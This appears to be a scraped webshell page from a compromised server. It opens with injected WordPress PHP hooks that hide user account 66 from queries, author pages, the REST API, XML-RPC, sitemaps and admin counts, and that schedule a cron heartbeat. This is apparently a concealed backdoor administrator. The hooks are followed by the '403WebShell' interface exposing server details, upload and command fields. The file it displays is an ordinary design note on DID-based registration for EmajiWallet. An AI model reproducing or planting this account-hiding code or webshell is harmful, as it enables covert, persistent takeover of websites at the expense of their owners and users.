add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/emajiwallet/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/emajiwallet/DID_REGISTRATION_IMPLEMENTATION.md
# DID Registration Implementation

## Overview
Users can now register for EmajiWallet using a Decentralized Identifier (DID) as their primary contact method, alongside the existing email and phone options.

## Implementation Details

### 1. Registration Form Updates
**File:** [resources/views/auth/wallet_register.blade.php](resources/views/auth/wallet_register.blade.php)

- Added "DID (Decentralized Identifier)" as a third radio option
- Added DID input field with placeholder examples (`did:web:example.com` or `did:key:z6Mk...`)
- Labeled as "For advanced users with existing DIDs"
- Includes helpful text explaining the user will need to sign a challenge
- JavaScript automatically shows/hides the DID field based on selection

### 2. Controller Updates
**File:** [app/Http/Controllers/Auth/WalletRegisterController.php](app/Http/Controllers/Auth/WalletRegisterController.php)

**Validation:**
- Added `'did'` to accepted `contact_method` values
- Added DID field validation:
  - Required if contact_method is 'did'
  - Must match regex pattern: `^did:[a-z0-9]+:.+$`
  - Must be unique in user_identifiers table

**User Creation:**
- Creates UserIdentifier record with type='did'
- Sets as primary if DID is the chosen contact method

**Post-Registration Flow:**
- **Email/Phone:** Redirects to dashboard (existing behavior)
- **DID:** Creates verification challenge and redirects to DID signature verification page
  - Generates 32-character random challenge
  - Creates VerificationToken with 60-minute expiry
  - User must sign challenge to complete registration

## User Flow

### DID Registration Process:
1. User visits registration page
2. User selects "DID (Decentralized Identifier)" radio button
3. DID input field appears
4. User enters their DID (e.g., `did:web:badgau.net`)
5. User completes other required fields (country, PIN, privacy agreement)
6. User clicks "Register"
7. **System creates account and logs user in**
8. **System redirects to DID verification challenge page**
9. User sees challenge string and form to paste signature
10. User signs challenge with their DID's private key using external tool
11. User pastes signature and submits
12. **System verifies signature cryptographically:**
    - Resolves DID document
    - Extracts public key
    - Verifies Ed25519 signature
13. On success: DID marked as verified, user redirected to dashboard

## Security Considerations

### Validation
- DID format validated with regex to ensure proper structure
- DID uniqueness enforced (one DID per user)
- Challenge-response prevents replay attacks
- Token expires after 60 minutes

### Verification
- Uses production-ready cryptographic verification (Ed25519)
- Supports did:web, did:key, and universal resolver
- Full DID document resolution with public key extraction
- See [DID_VERIFICATION_PRODUCTION_READY.md](DID_VERIFICATION_PRODUCTION_READY.md) for details

## User Experience

### Why DID Option?
- **Privacy:** No email or phone required
- **Self-Sovereign:** User controls their identity
- **Immediate:** No waiting for email/SMS
- **Cryptographic:** Strong proof of ownership

### UI Positioning
- Listed as third option after Email and Phone
- Marked as "For advanced users" to set expectations
- Includes helpful hints about signing requirement
- Clean show/hide behavior matches existing pattern

## Technical Requirements

- PHP extensions: `sodium`, `gmp`
- External tools needed: DID wallet or signing tool (e.g., Node.js with @stablelib/ed25519)
- Supported DID methods: did:web, did:key, others via Universal Resolver
- Supported key types: Ed25519VerificationKey2020, Ed25519VerificationKey2018

## Testing

To test DID registration:

1. Navigate to `/register/wallet`
2. Select "DID (Decentralized Identifier)" option
3. Enter a valid DID (e.g., `did:web:example.com`)
4. Complete registration form
5. Sign the challenge with your DID's private key
6. Verify signature validation works correctly

## Files Modified

1. `resources/views/auth/wallet_register.blade.php` - Added DID UI option
2. `app/Http/Controllers/Auth/WalletRegisterController.php` - Added DID validation and flow
3. Uses existing `app/Services/DidVerificationService.php` - Cryptographic verification
4. Uses existing `app/Models/VerificationToken.php` - Challenge token management
5. Uses existing `resources/views/identity/verify_did.blade.php` - Verification UI

## Future Enhancements

- Add "What is a DID?" help modal on registration page
- Support more key types (secp256k1 for Ethereum-based DIDs)
- Optional: Skip verification and allow later verification from settings
- Optional: DID document caching for performance

Youez - 2016 - github.com/yon3zu
LinuXploit